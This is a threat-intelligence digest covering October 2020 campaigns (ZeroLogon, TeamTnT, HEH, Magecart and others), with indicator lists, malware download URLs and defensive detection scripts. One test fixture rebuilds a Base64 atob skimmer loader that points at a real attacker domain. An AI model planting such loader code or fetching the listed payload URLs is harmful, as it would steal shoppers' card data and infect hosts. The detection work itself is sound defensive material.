Weekly Threat Intelligence Digest

October 9, 2020

This week, we digest a ZeroLogon vulnerability campaign, the BAHAMUT threat group, the HEH Botnet, Magecart attacks, and more.


Ransomware Gang Now Using Critical Windows Flaw in Attacks

October 9, 2020

Threat group TA505 is exploiting the ZeroLogon vulnerability (CVE-2020-1472) through an updated build of Mimikatz that bundles the exploit, using it to gain elevated privileges on the target's domain controllers and to run malicious scripts. TA505 has been active since 2014, attacking victims across a wide range of industries and distributing a variety of malware, including banking trojans, backdoors, and ransomware.

CVEs of Interest: CVE-2020-1472

MITRE ATT&CK: ATT&CK 05 Defense Evasion - Trusted Developer Utilities Proxy Execution - MSBuild, ATT&CK 10 Command and Control, ATT&CK 12 Impact - Data Encrypted for Impact

Source: Bleeping Computer
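A detection angle on this item, as an added example that is not code from Bleeping Computer or from the TA505 campaign: the ZeroLogon password reset leaves a Windows Security event 4742 ("A computer account was changed") on the domain controller in which the subject is ANONYMOUS LOGON and the target is a computer account. The script below assumes events exported one per line as key=value pairs (field names follow the real 4742 event) and flags that pattern. The sample events are constructed.

```python
"""Flag Security-log events that match the ZeroLogon (CVE-2020-1472) exploitation
pattern: a computer account (name ending in '$') changed by ANONYMOUS LOGON, which
is what the unauthenticated Netlogon password reset leaves behind in event 4742.

Added example for this digest entry; not code from Bleeping Computer or from the
TA505 campaign. Assumption: events are exported one per line as key=value pairs
(field names follow the real 4742 event: SubjectUserName, TargetUserName,
PasswordLastSet). The sample events below are constructed.
"""
import re
from dataclasses import dataclass
from typing import Dict, Iterable, List

# Constructed sample: one exploitation-shaped event, one routine machine-account
# rotation, one ANONYMOUS change without a password timestamp, and a non-4742 event.
SAMPLE_EVENTS = """\
EventID=4742 SubjectUserName=ANONYMOUS LOGON SubjectDomainName=NT AUTHORITY TargetUserName=DC01$ PasswordLastSet=10/9/2020 3:14:07 PM
EventID=4742 SubjectUserName=DC01$ SubjectDomainName=CORP TargetUserName=DC01$ PasswordLastSet=10/9/2020 1:00:00 AM
EventID=4742 SubjectUserName=ANONYMOUS LOGON SubjectDomainName=NT AUTHORITY TargetUserName=WKSTN07$ PasswordLastSet=-
EventID=4624 SubjectUserName=ANONYMOUS LOGON SubjectDomainName=NT AUTHORITY TargetUserName=DC01$ PasswordLastSet=-
"""

# key=value pairs whose values may contain spaces; a value runs until the next " key=".
_KV = re.compile(r"(\w+)=(.*?)(?=\s+\w+=|\s*$)")


def parse_event(line: str) -> Dict[str, str]:
    """Parse one exported event line into a field dict."""
    return {key: value.strip() for key, value in _KV.findall(line)}


@dataclass
class Hit:
    target: str           # computer account that was modified
    password_reset: bool  # True when PasswordLastSet carries a new timestamp
    raw: str


def find_zerologon_hits(lines: Iterable[str]) -> List[Hit]:
    """Return 4742 events in which ANONYMOUS LOGON modified a computer account."""
    hits: List[Hit] = []
    for line in lines:
        line = line.strip()
        if not line:
            continue
        ev = parse_event(line)
        if ev.get("EventID") != "4742":
            continue
        if ev.get("SubjectUserName", "").upper() != "ANONYMOUS LOGON":
            continue
        target = ev.get("TargetUserName", "")
        if not target.endswith("$"):
            continue
        hits.append(Hit(target=target,
                        password_reset=ev.get("PasswordLastSet", "-") != "-",
                        raw=line))
    return hits


if __name__ == "__main__":
    for hit in find_zerologon_hits(SAMPLE_EVENTS.splitlines()):
        what = "PASSWORD RESET" if hit.password_reset else "account change"
        print(f"[ZeroLogon?] {hit.target}: {what} by ANONYMOUS LOGON")
```

A hit whose target is a domain controller account and whose PasswordLastSet has just changed is the strongest signal; an ANONYMOUS change to any other computer account is still abnormal and worth triage. Patched domain controllers additionally log events 5827 and 5828 for denied vulnerable Netlogon connections, which catch attempts rather than successes.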

 


BAHAMUT: Hack-for-Hire Masters of Phishing, Fake News, and Fake Apps

October 7, 2020

Researchers at BlackBerry today released a white paper covering the threat group known as BAHAMUT, a sophisticated hack-for-hire cyberespionage group known for its strong technical capabilities and for the growing role it plays in the market for outsourced, third-party intelligence operations.

MITRE ATT&CK: ATT&CK 01 Initial Access - Phishing, ATT&CK 02 Execution, ATT&CK 02 Execution - Command and Scripting Interpreter - Python, ATT&CK 02 Execution - Command and Scripting Interpreter - Visual Basic, ATT&CK 03 Persistence, ATT&CK 06 Credential Access - OS Credential Dumping, ATT&CK 09 Collection - Screen Capture, ATT&CK 10 Command and Control, ATT&CK 10 Command and Control - Remote Access Software, Zero Day Exploit

Indicators:
Domain
account-googie[.]com
accountvalidate[.]com
airfitgym[.]com
ambicluster[.]com
aspnet.dyndns.info
assurecom[.]info
bulletinalerts[.]com
File
013417bd5465d6362cd43c70015c7a74a1b8979785b842b7cfa543cb85985852
05a4e1e6542d6b0ba7b6eced12c05e96a341deaf88adb28695365544940da5ed
085de1580421aefe1d581f4b6012a485e2665cee78630b6a0c311ee3bc8409b6
08e65f09e41da3bc211a77ced8af657bde00d7a2b93d77446f29b6c8c3262ccd
090bc0f5936a12771b7fdf15070ba2169a24108a095e939920498b94ce19596d
0a721dc82ec7eb9c20c44dbcac047879b8d15d54b3a186aaf8079058b10b30c9
0caaf92b928446e8705587744951568d96fa68d7bf4a9988ea9e98cf6ffb44f3
0d349d085c81fde9febc3b67d615ff35b6823d1742f6039aff4f2b8a68f06bfb
IPv4
103.220.47.104
103.220.47.16
103.234.220.152
103.234.220.153
164.160.131.174
167.114.194.56

This report includes over 250 indicators.

Source: Blackberry

 


HP Device Manager Vulnerabilities May Allow Full System Takeover

October 7, 2020

Three HP Device Manager vulnerabilities (CVE-2020-6925, CVE-2020-6926, and CVE-2020-6927) can be chained to achieve remote command execution and full takeover of the affected system. HP has released patches; however, a working exploit could readily be crafted against any installation that has not been updated.

CVEs of Interest: CVE-2020-6925, CVE-2020-6926, CVE-2020-6927

MITRE ATT&CK: ATT&CK 02 Execution, ATT&CK 04 Privilege Escalation

Source: Help Net Security

 


PoetRAT: Malware Targeting Public and Private Sector in Azerbaijan Evolves

October 6, 2020

The PoetRAT malware, first identified in April 2020, has been seen targeting key public and private sector organizations across Azerbaijan amid the violence in the Nagorno-Karabakh region. The still-unidentified actors behind the attacks have made PoetRAT harder to detect, adding a new exfiltration protocol and obfuscation techniques to hide their activity.

MITRE ATT&CK: ATT&CK 01 Initial Access - Phishing, ATT&CK 02 Execution, ATT&CK 02 Execution - Command and Scripting Interpreter - Python, ATT&CK 03 Persistence - Office Application Startup - Office Template Macros, ATT&CK 10 Command and Control, ATT&CK 11 Exfiltration

Indicators:
Domain
slimip.accesscam.org
File
constant.py
E4E99DC07FAE55F2FA8884C586F8006774FE0F16232BD4E13660A8610B1850A2
208EC23C233580DBFC53AAD5655845F7152ADA56DD6A5C780D54E84A9D227407
A703DC8819DCA1BC5774DE3B6151C355606E7FE93C760B56BC09BCB6F928BA2D
AC4E621CC5895F63A226F8EF183FE69E1AE631E12A5DBEF97DD16A6DFAFD1BFC
DC565146CD4ECFB45873E44AA1EA1BAC8CFA8FB086140154B429BA7274CDA9A2
64AEFFE15AECE5AE22E99D9FD55657788E71C1C52CEB08E3B16B8475B8655059

Source: Cisco Talos

 


HEH, A New IoT P2P Botnet Going After Weak Telnet Services

October 6, 2020

A newly discovered botnet has been observed in the wild performing DDoS attacks and cryptomining. The botnet, named HEH, is written in Go, spreads by brute-forcing the Telnet service on ports 23 and 2323, and can execute arbitrary shell commands on infected devices.

MITRE ATT&CK: ATT&CK 06 Credential Access - Brute Force

Indicators:
File
4F9B895A2785F9788FCAE8743AB04A24B62E0962B1F8A28DC1206C52327B7916
D302749A080DD73E25673560857495BA14FA382857F64D26138ACB044E2D9242
66786509C16E3285C5E9632AB9019BC7
C2C26A7B2A5412C9545A46E1B9B37B0E
C1B2A59F1F1592D9713AA9840C34CADE
BD07315639DA232E6BB4F796231DEF8A
6BE1590AC9E87DD7FE19257213A2DB32
4C345FDEA97A71AC235F2FA9DDB19F05
984FD7FFB7D9F20246E580E15FD93EC7
6C815DA9AF17BFA552BEB8E25749F313
43DE9C5FBAB4CD59B3EAB07A81EA8715
6FA68865F1A2DDD1CF22F1EBA583517C05B6F6C3
EFF1CE72EDDC9DE694901F410A873A9D1ED21339

Source: 360Netlab
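The propagation behaviour described above (brute-force attempts against Telnet on 23/2323, spread across many hosts in a short time) is visible in ordinary connection logs. The following is an added example, not code from 360Netlab or from the HEH bot: it assumes a CSV export with columns ts,src,dst,dport, sorted by time, and the log lines are constructed. It alerts on a source that hits several distinct hosts on Telnet ports inside a sliding window, so that an administrator repeatedly logging into one switch does not trip it.

```python
"""Spot Telnet brute-force sweeps of the kind HEH uses (many hosts, ports 23/2323,
short time window) in a connection log.

Added example for this digest entry; not code from 360Netlab or from the HEH bot.
Assumptions: a CSV export with columns ts,src,dst,dport (ISO-8601 timestamps,
already sorted by time), one row per connection attempt. The log lines are constructed.
"""
import csv
from collections import defaultdict, deque
from datetime import datetime, timedelta
from io import StringIO
from typing import Deque, Dict, Iterable, List, Tuple

TELNET_PORTS = {23, 2323}

# Constructed: 203.0.113.7 sweeps seven hosts in a few seconds; 198.51.100.5 is an
# admin re-logging into one switch a handful of times over an hour.
SAMPLE_LOG = """\
ts,src,dst,dport
2020-10-06T10:00:01,198.51.100.5,192.0.2.10,23
2020-10-06T10:00:05,203.0.113.7,192.0.2.10,23
2020-10-06T10:00:06,203.0.113.7,192.0.2.11,23
2020-10-06T10:00:06,203.0.113.7,192.0.2.12,2323
2020-10-06T10:00:07,203.0.113.7,192.0.2.13,23
2020-10-06T10:00:08,203.0.113.7,192.0.2.14,23
2020-10-06T10:00:09,203.0.113.7,192.0.2.15,2323
2020-10-06T10:00:09,203.0.113.7,192.0.2.16,23
2020-10-06T10:00:10,203.0.113.7,192.0.2.17,80
2020-10-06T10:20:00,198.51.100.5,192.0.2.10,23
2020-10-06T10:40:00,198.51.100.5,192.0.2.10,23
2020-10-06T10:41:00,198.51.100.5,192.0.2.10,23
2020-10-06T10:42:00,198.51.100.5,192.0.2.10,23
2020-10-06T10:43:00,198.51.100.5,192.0.2.10,23
2020-10-06T10:44:00,198.51.100.5,192.0.2.10,23
"""


def load_rows(text: str) -> List[Dict[str, str]]:
    return list(csv.DictReader(StringIO(text)))


def detect_telnet_sweeps(rows: Iterable[Dict[str, str]],
                         window: timedelta = timedelta(minutes=5),
                         min_attempts: int = 6,
                         min_targets: int = 4) -> Dict[str, dict]:
    """Return {src: alert} for sources that, inside one sliding window, made at least
    min_attempts Telnet connections to at least min_targets distinct hosts.
    Requiring distinct targets keeps a repeated login to one device from alerting."""
    recent: Dict[str, Deque[Tuple[datetime, str]]] = defaultdict(deque)
    alerts: Dict[str, dict] = {}
    for row in rows:
        if int(row["dport"]) not in TELNET_PORTS:
            continue
        ts = datetime.fromisoformat(row["ts"])
        src = row["src"]
        q = recent[src]
        q.append((ts, row["dst"]))
        while q and ts - q[0][0] > window:   # drop attempts older than the window
            q.popleft()
        targets = {dst for _, dst in q}
        if src not in alerts and len(q) >= min_attempts and len(targets) >= min_targets:
            alerts[src] = {"first_seen": q[0][0].isoformat(),
                           "attempts": len(q),
                           "targets": sorted(targets)}
    return alerts


if __name__ == "__main__":
    for src, a in detect_telnet_sweeps(load_rows(SAMPLE_LOG)).items():
        print(f"{src}: {a['attempts']} Telnet attempts against "
              f"{len(a['targets'])} hosts since {a['first_seen']}")
```

The thresholds are starting points; on a network where Telnet should not exist at all, any inbound attempt on 23 or 2323 from the internet is already worth an alert, and the better fix is to disable Telnet on the devices and block the ports at the edge.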

 


MosaicRegressor: Lurking in the Shadows of UEFI

October 5, 2020

A UEFI rootkit, dubbed MosaicRegressor by Kaspersky, has been discovered in the wild in the hands of a Chinese-speaking threat group conducting data theft and espionage operations. MosaicRegressor is only the second UEFI rootkit ever identified in the wild, the first being LoJax, discovered in 2018.

CVEs of Interest: CVE-2018-0802

MITRE ATT&CK: ATT&CK 01 Initial Access - Phishing, ATT&CK 02 Execution - User Execution - Malicious File, ATT&CK 03 Persistence - BITS Jobs, ATT&CK 03 Persistence - Pre-OS Boot - Bootkit, ATT&CK 10 Command and Control

Indicators:
Domain
menjitghyukl.myfirewall.org
File
8F939E65E9FFEDD16AE86687E154ADBE607D56950D082778300039283F2F8330
F5B320F7E87CC6F9D02E28350BB87DE6
B53880397D331C6FE3493A9EF81CD76E
91A473D3711C28C3C563284DFAFE926B
DD8D3718197A10097CD72A94ED223238
0EFB785C75C3030C438698C77F6E960E
12B5FED367DB92475B071B6D622E44CD
3B3BC0A2772641D2FC2E7CBC6DDA33EC
70DEF87D180616406E010051ED773749
7908B9935479081A6E0F681CCEF2FDD9
AE66ED2276336668E793B167B6950040
B23E1FE87AE049F46180091D643C0201
CFB072D1B50425FF162F02846ED263F9
0D386EBBA1CCF1758A19FB0B25451AFE
233B300A58D5236C355AFD373DABC48B
449BE89F939F5F909734C0E74A0B9751
67CF741E627986E97293A8F38DE492A7
6E949601EBDD5D50707C0AF7D3F3C7A5
92F6C00DA977110200B5A3359F5E1462
A69205984849744C39CFB421D8E97B1F
D197648A3FB0D8FF6318DB922552E49E
AFC09DEB7B205EADAE4268F954444984
DC14EE862DDA3BCC0D2445FDCB3EE5AE
88750B4A3C5E80FD82CF0DD534903FC0
C63D3C25ABD49EE131004E6401AF856C
D273CD2B96E78DEF437D9C1E37155E00
72C514C0B96E3A31F6F1A85D8F28403C
9E182D30B070BB14A8922CFF4837B94D
61B4E0B1F14D93D7B176981964388291
3D2835C35BA789BD86620F98CBFBF08B
328AD6468F6EDB80B3ABF97AC39A0721
7B213A6CE7AB30A62E84D81D455B4DEA
E2F4914E38BB632E975CFF14C39D8DCD
08ECD8068617C86D7E3A3E810B106DCE
1732357D3A0081A87D56EE1AE8B4D205
74DB88B890054259D2F16FF22C79144D
7C3C4C4E7273C10DBBAB628F6B2336D8
89527F932188BD73572E2974F4344D46
36B51D2C0D8F48A7DC834F4B9E477238
1C5377A54CBAA1B86279F63EE226B1DF
9F13636D5861066835ED5A79819AAC28
FA0A874926453E452E3B6CED045D2206
C2695EF5F3A400219CAA2347F5B914C15D74A133EFA24D96D121ACFA7F95A67E
0FDCEA00A78E0263CAA45205D09B107BD50A9696F59A66951E8B9AFC42D54E02
64EABFC0612AC82EB80B8E955549B6A01899B712A99243D116E087828CA9E070
2C0DF314DCDC9FA161F5F31369037F747A794E26CEE6F8835CC37EEF3077F782
2E85CA515ACBFD4B03F93218764E3166AF04EB6F75DE14CE4DFD97D6EF259579
9F17B875E06D0DCA92807BDB7EAB2CC9437EE735
1648AE7C4BA4E87D9B6F02D6C99675C394F44A26
6896F9B29570A5DDF4DBA2831ECFD39476EE075A
FF52A54976BD89D31E246C23A267B8835CDE9383
ED1A2DC37066DC83947BE46B67A4F693B9D18F3E
IPv4
103.243.24.171
103.82.52.18
103.195.150.106
103.229.1.26
103.243.26.211
103.30.40.116
103.30.40.39
103.39.109.239
103.39.109.252
103.39.110.193
103.56.115.69
117.18.4.6
144.48.241.167
144.48.241.32
150.129.81.21
43.252.228.179
43.252.228.252
43.252.228.75
43.252.228.84
43.252.230.180
43.252.230.173
185.216.117.91
103.215.82.161
103.96.72.148
122.10.82.30

Source: Kaspersky

 


Black-T: New Cryptojacking Variant from TeamTnT

October 5, 2020

Unit 42 has uncovered a new cryptojacking malware variant, dubbed Black-T, being used in operations by threat group TeamTnT. The group targets exposed Docker daemon APIs and, upon successful exploitation, drops Black-T. TeamTnT is known for stealing AWS credential files and for mining Monero cryptocurrency.

MITRE ATT&CK: ATT&CK 10 Command and Control, ATT&CK 11 Exfiltration

Indicators:
Domain
iplogger.org
moneroocean.stream
teamtnt.red
cruxpool.com
File
gimmecredz.sh
mimipenguin.py
mimipenguin.sh
mimipy.py
pack.py
pupyimporter.py
URL
https://teamtnt.red/black-t/setuptheblack-t
https://teamtnt.red/black-t/beta
https://teamtnt.red/black-t/setup/bd
https://teamtnt.red/only_for_stats/dup.php
https://teamtnt.red/x/pw
https://teamtnt.red/black-t/cleanupthisbox
https://teamtnt.red/black-t/setup/docker-update
https://teamtnt.red/black-t/setup/hole
https://teamtnt.red/black-t/setup/kube
https://teamtnt.red/black-t/setup/tshd
https://teamtnt.red/black-t/systemmod
https://teamtnt.red/ip_log/getip.php
https://teamtnt.red/x/getpwds.tar.gz
https://iplogger.org/blahblahblah

Source: Palo Alto Networks, Unit 42
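The "exposed Docker daemon API" that TeamTnT scans for is usually a dockerd started with a TCP listener and no client-certificate verification (the `-H tcp://0.0.0.0:2375` flag, or the equivalent `hosts` entry in daemon.json). As an added example, not code from Unit 42 or from TeamTnT's tooling, the audit below reads a daemon.json and classifies it. The weak and hardened configurations are constructed, and the certificate paths under /etc/docker are illustrative.

```python
"""Audit a Docker daemon.json for the exposure TeamTnT looks for: a TCP API listener
without mutual TLS. dockerd reads the same settings it accepts as -H / --tlsverify flags.

Added example for this digest entry; not code from Unit 42 or from TeamTnT tooling.
The configurations below are constructed: one weak, one hardened, one socket-only.
"""
import json
from typing import Dict, List
from urllib.parse import urlsplit

WEAK_DAEMON_JSON = json.dumps({
    "hosts": ["unix:///var/run/docker.sock", "tcp://0.0.0.0:2375"]
})

HARDENED_DAEMON_JSON = json.dumps({
    "hosts": ["unix:///var/run/docker.sock", "tcp://0.0.0.0:2376"],
    "tlsverify": True,                      # require a client cert signed by the CA
    "tlscacert": "/etc/docker/ca.pem",      # illustrative paths
    "tlscert": "/etc/docker/server-cert.pem",
    "tlskey": "/etc/docker/server-key.pem",
})

SOCKET_ONLY_DAEMON_JSON = json.dumps({"hosts": ["unix:///var/run/docker.sock"]})

TLS_FILE_KEYS = ("tlscacert", "tlscert", "tlskey")


def audit_daemon_json(text: str) -> Dict[str, object]:
    """Classify a daemon.json: 'critical' when the API is reachable over TCP without
    client-certificate verification, 'warn' when tlsverify is set but the
    certificate files are missing, otherwise 'ok'."""
    cfg = json.loads(text)
    tcp_listeners = [h for h in cfg.get("hosts", []) if h.startswith("tcp://")]
    tls_enforced = bool(cfg.get("tlsverify"))
    issues: List[str] = []
    notes: List[str] = []
    if tcp_listeners:
        if not tls_enforced:
            issues.append("TCP API listener without tlsverify: anyone who can reach "
                          "it can run containers as root on the host")
        else:
            missing = [k for k in TLS_FILE_KEYS if not cfg.get(k)]
            if missing:
                issues.append("tlsverify set but missing: " + ", ".join(missing))
        wide_open = [h for h in tcp_listeners
                     if urlsplit(h).hostname in (None, "", "0.0.0.0", "::")]
        if wide_open:
            notes.append("listener bound to all interfaces: " + ", ".join(wide_open))
    if tcp_listeners and not tls_enforced:
        severity = "critical"
    elif issues:
        severity = "warn"
    else:
        severity = "ok"
    return {"tcp_listeners": tcp_listeners, "tls_enforced": tls_enforced,
            "issues": issues, "notes": notes, "severity": severity}


if __name__ == "__main__":
    for name, text in [("weak", WEAK_DAEMON_JSON), ("hardened", HARDENED_DAEMON_JSON),
                       ("socket-only", SOCKET_ONLY_DAEMON_JSON)]:
        result = audit_daemon_json(text)
        print(f"{name}: {result['severity']} {result['issues'] + result['notes']}")
```

A binding to all interfaces is reported as a note rather than an issue because it is acceptable once client certificates are required; what matters is that no unauthenticated TCP listener exists, and that the host firewall or security group does not expose 2375/2376 to the internet regardless.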

 


Anti-Virus Vulnerabilities: Who’s Guarding the Watch Tower?

October 5, 2020

Researchers at CyberArk Labs detail privilege-escalation vulnerabilities discovered in popular antivirus products. The flaws stem from the default Discretionary Access Control Lists (DACLs) on the Windows ProgramData folder, which let any local user create files and subdirectories there; because antivirus components run with high privileges and write into those directories, a low-privileged attacker who already has a foothold can abuse them to elevate privileges on the compromised system. Affected products include those from Avira, Check Point, Fortinet, Kaspersky, McAfee, Microsoft Defender, Symantec, and Trend Micro, each of which has since been fixed by its vendor.

CVEs of Interest: CVE-2020-25043, CVE-2020-25044, CVE-2020-25045, CVE-2020-7250, CVE-2020-7310, CVE-2019-1954, CVE-2020-9290, CVE-2019-8452, CVE-2019-19688, CVE-2019-19689, CVE-2020-13903, CVE-2019-1161

MITRE ATT&CK: ATT&CK 02 Execution, ATT&CK 04 Privilege Escalation

Source: CyberArk
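The check a defender would want for this item is whether a privileged product's working directory still grants write-type rights to ordinary users. As an added example, not code from CyberArk, the parser below reads `icacls` output and reports write-capable ACEs held by low-privilege principals. The first sample is constructed to mirror the Windows default for the ProgramData folder (Users hold (CI)(WD) and (CI)(AD), which is exactly what the research abuses); the second is a hypothetical vendor directory (ExampleAV) that breaks inheritance and grants Users read-only access.

```python
"""Parse icacls output and flag write-capable ACEs granted to low-privilege
principals: the ProgramData default that the CyberArk research builds on.

Added example for this digest entry; not code from CyberArk. The icacls output
below is constructed to mirror the Windows default for the ProgramData folder and
a hypothetical vendor directory (ExampleAV). On a real host, feed the output of
`icacls <path>` to parse_icacls().
"""
import re
from typing import Dict, List

PROGRAMDATA_ICACLS = r"""C:\ProgramData NT AUTHORITY\SYSTEM:(OI)(CI)(F)
               BUILTIN\Administrators:(OI)(CI)(F)
               CREATOR OWNER:(OI)(CI)(IO)(F)
               BUILTIN\Users:(OI)(CI)(RX)
               BUILTIN\Users:(CI)(WD)
               BUILTIN\Users:(CI)(AD)

Successfully processed 1 files; Failed processing 0 files
"""

# Hypothetical vendor directory that breaks inheritance: Users can only read.
HARDENED_ICACLS = r"""C:\ProgramData\ExampleAV\Logs NT AUTHORITY\SYSTEM:(OI)(CI)(F)
                              BUILTIN\Administrators:(OI)(CI)(F)
                              BUILTIN\Users:(OI)(CI)(RX)

Successfully processed 1 files; Failed processing 0 files
"""

LOW_PRIV = {"BUILTIN\\Users", "Everyone",
            "NT AUTHORITY\\Authenticated Users", "NT AUTHORITY\\INTERACTIVE"}
# Simple and specific rights that let a principal create, modify or delete content.
WRITE_RIGHTS = {"F", "M", "W", "WD", "AD", "D", "DC", "WDAC", "WO", "WA", "WEA", "GW"}
INHERIT_FLAGS = {"OI", "CI", "IO", "NP", "I"}

# "<principal>:(flag)(flag)(rights)" as printed by icacls
_ACE = re.compile(r"^(?P<who>.+?):(?P<flags>(?:\([^)]*\))+)$")


def parse_icacls(output: str, path: str) -> List[Dict[str, object]]:
    """Return one dict per ACE: principal, deny flag, inheritance flags, rights."""
    aces: List[Dict[str, object]] = []
    for line in output.splitlines():
        line = line.strip()
        if line.lower().startswith(path.lower()):   # first line carries the path
            line = line[len(path):].strip()
        m = _ACE.match(line)
        if not m:
            continue  # blank line or the "Successfully processed" trailer
        tokens = [t.strip() for grp in re.findall(r"\(([^)]*)\)", m.group("flags"))
                  for t in grp.split(",")]
        aces.append({
            "who": m.group("who"),
            "deny": "DENY" in tokens,
            "inherit": [t for t in tokens if t in INHERIT_FLAGS],
            "rights": [t for t in tokens if t not in INHERIT_FLAGS and t != "DENY"],
        })
    return aces


def weak_write_aces(aces: List[Dict[str, object]]) -> List[Dict[str, object]]:
    """ACEs that let a low-privilege principal create or modify content."""
    return [a for a in aces
            if a["who"] in LOW_PRIV and not a["deny"] and set(a["rights"]) & WRITE_RIGHTS]


if __name__ == "__main__":
    for label, text, path in [("ProgramData", PROGRAMDATA_ICACLS, r"C:\ProgramData"),
                              ("ExampleAV", HARDENED_ICACLS, r"C:\ProgramData\ExampleAV\Logs")]:
        for ace in weak_write_aces(parse_icacls(text, path)):
            print(f"{label}: {ace['who']} has {ace['rights']} (inherit {ace['inherit']})")
```

A (CI) entry on ProgramData is inherited by every subdirectory a privileged service creates there unless the service explicitly sets its own DACL, which is the fix the vendors shipped: the product directory must not inherit the Users write/append entries.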

 


New Pastebin-like Service Used in Multiple Malware Campaigns

October 5, 2020

Juniper Threat Labs has observed malware campaigns that use the legitimate Pastebin-like web service paste.nrecom.net within their infection chain. The research team has identified AgentTesla, LimeRAT, and Redline Stealer campaigns using paste.nrecom.net to host both configuration data and malicious executables.

MITRE ATT&CK: ATT&CK 01 Initial Access - Phishing, ATT&CK 12 Impact - Data Encrypted for Impact

Indicators:
Domain
italake.com
lol.thezone.vip
thezone.vip
Files
9C38AB9D806417E89E3C035740421977F92A15C12F9FA776AC9665A1879E5F67
B50D4FD8B572C3A13C4997C83E0BBBC3F7A270E75B79EC09512142F5560F61AB
022D911560F38D5165EA4196AC74A141531D3E244CDC9BE895E539F7143A7BBB
3D3AB28F09D5736FCD2215FB6395E7B15E6E9F1F86931B1D3D956C70879E9D33
682FDD0B1A94EA8F92981FD6B697A5C4FF817FF6E838285655EDE39107CA9ADE
3DB65B267A1E41EBB307B706F561866DCE2752041F482ABE93F73144DF9A1D4D
C8ABCEDB3EC20F7AB5D9B98CC32F03B318EBA61F344E0537E4D4DE673422C6B1
52F124A478C562251459CACC60B7AFA952A8C02DF7342C1A951502307BA7B33F
9C0B50BA7EA383BF16B25EA12A830D5C63C5C995AB2F494DC270137ECFD31701
IPv4
198.12.66.108
URL
https://paste.nrecom.net/view/raw/3529ec57
https://paste.nrecom.net/view/raw/39468747
https://paste.nrecom.net/view/raw/c7dfc858
https://paste.nrecom.net/view/raw/bfbb1544
https://paste.nrecom.net/view/raw/d8aedaf6
https://paste.nrecom.net/view/raw/04fba6cb
https://paste.nrecom.net/view/raw/aec14685
https://paste.nrecom.net/view/raw/6306a51c
https://paste.nrecom.net/view/raw/4736837b
https://paste.nrecom.net/view/raw/3c3ececf
https://paste.nrecom.net/view/raw/7900ed08
https://paste.nrecom.net/view/raw/91aec4e7
https://paste.nrecom.net/view/raw/4f789f73
https://paste.nrecom.net/view/raw/93a7cd20
https://paste.nrecom.net/view/raw/bfefa179
http://198.12.66.108/v.exe
https://paste.nrecom.net/view/raw/bd63e76f
https://paste.nrecom.net/view/raw/bebcab0a
http://italake.com/assets/css/0022.exe
http://lol.thezone.vip/v.exe
https://paste.nrecom.net/view/raw/0d9233c8
https://paste.nrecom.net/view/raw/b44fe71a
https://paste.nrecom.net/view/raw/6550c073
https://paste.nrecom.net/view/raw/7f41da66
https://paste.nrecom.net/view/raw/658b9281
https://paste.nrecom.net/view/raw/019f27dd
https://paste.nrecom.net/view/raw/3066146f
https://paste.nrecom.net/view/raw/c230a816

This report includes over 150 indicators.

Source: Juniper Threat Labs

 


Mobile Network Operator Falls Into The Hands of Fullz House Criminal Group

October 5, 2020

Boom! Mobile has fallen victim to a Magecart card-skimming attack by the threat group Fullz House, also known as Magecart Group 4. The attack involves the injection of a Base64-encoded URL that loads a credit card skimmer designed to look like a Google Analytics element. At the time of writing, the Boom! Mobile website is still compromised and online shoppers remain at risk.

MITRE ATT&CK: ATT&CK 10 Command and Control, ATT&CK 11 Exfiltration

Indicators:
Domain
google-assistant.com
google-tasks.com
jquery-insert.com
boom.us
paypal-debit.com
google-standard.com
bing-analytics.com
google-money.com
google-sale.com
paypal-assist.com
connect-facebook.com
cdn-jquery.com
paypalapiobjects.com
googleapimanager.com
Email
medialand.regru@gmail.com
IPv4
8.208.79.49
47.254.170.245
URL
paypal-debit.com/cdn/ga.js

Source: Malwarebytes
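The injection technique above, a Base64-encoded loader URL inside an inline script that then pulls a lookalike "ga.js", is straightforward to hunt for in page source. The following is an added example, not code from Malwarebytes or from the skimmer: it decodes Base64 literals found in inline scripts, extracts any URL, and flags hosts that are not the provider they imitate. The page fragment is constructed; the encoded URL is the paypal-debit.com/cdn/ga.js loader from the indicator list; TRUSTED_DOMAINS and BRANDS are illustrative lists, not a complete allow-list.

```python
"""Find inline scripts that hide a loader URL in Base64, resolve it to a host,
and flag hosts that are not the analytics/CDN providers they imitate.

Added example for this digest entry; not code from Malwarebytes or from the skimmer.
SAMPLE_HTML and BENIGN_HTML are constructed; TRUSTED_DOMAINS and BRANDS are
illustrative and should be replaced with the site's real third-party inventory.
"""
import base64
import binascii
import re
from typing import Dict, List, Optional
from urllib.parse import urlparse

TRUSTED_DOMAINS = {"google-analytics.com", "googletagmanager.com", "googleapis.com",
                   "paypal.com", "jquery.com"}
BRANDS = ("google", "paypal", "jquery", "facebook", "bing")

_SCRIPT = re.compile(r"<script\b[^>]*>(.*?)</script>", re.I | re.S)
_ATOB = re.compile(r"atob\(\s*['\"]([A-Za-z0-9+/=]{16,})['\"]\s*\)")   # explicit decode
_B64 = re.compile(r"['\"]([A-Za-z0-9+/]{24,}={0,2})['\"]")              # any long literal
_URL = re.compile(r"https?://[^\s'\"<>]+")

SKIMMER_LOADER = "https://paypal-debit.com/cdn/ga.js"   # from the indicator list
_ENCODED = base64.b64encode(SKIMMER_LOADER.encode()).decode()
SAMPLE_HTML = (
    "<html><head>"
    "<script async src=\"https://www.googletagmanager.com/gtag/js?id=UA-0000\"></script>"
    "<script>(function(){var s=document.createElement('script');"
    "s.src=atob('" + _ENCODED + "');document.head.appendChild(s);})();</script>"
    "</head><body>checkout</body></html>"
)
BENIGN_HTML = ("<script>var u=atob('"
               + base64.b64encode(b"https://www.googletagmanager.com/gtag/js").decode()
               + "');</script>")


def is_trusted(host: str) -> bool:
    return host in TRUSTED_DOMAINS or any(host.endswith("." + d) for d in TRUSTED_DOMAINS)


def decode_candidate(token: str) -> Optional[str]:
    """Strict Base64 decode to text; None for anything that is not valid Base64/UTF-8."""
    try:
        return base64.b64decode(token, validate=True).decode("utf-8")
    except (binascii.Error, ValueError, UnicodeDecodeError):
        return None


def find_hidden_loaders(html: str) -> List[Dict[str, Optional[str]]]:
    findings: List[Dict[str, Optional[str]]] = []
    for body in _SCRIPT.findall(html):
        tokens = set(_ATOB.findall(body)) | set(_B64.findall(body))
        for token in sorted(tokens):
            text = decode_candidate(token)
            if text is None:
                continue
            for url in _URL.findall(text):
                host = (urlparse(url).hostname or "").lower()
                if not host or is_trusted(host):
                    continue
                findings.append({"url": url, "host": host, "encoded": token,
                                 "lookalike_of": next((b for b in BRANDS if b in host), None)})
    return findings


if __name__ == "__main__":
    for f in find_hidden_loaders(SAMPLE_HTML):
        print(f"hidden loader -> {f['url']} (host {f['host']}, imitates {f['lookalike_of']})")
```

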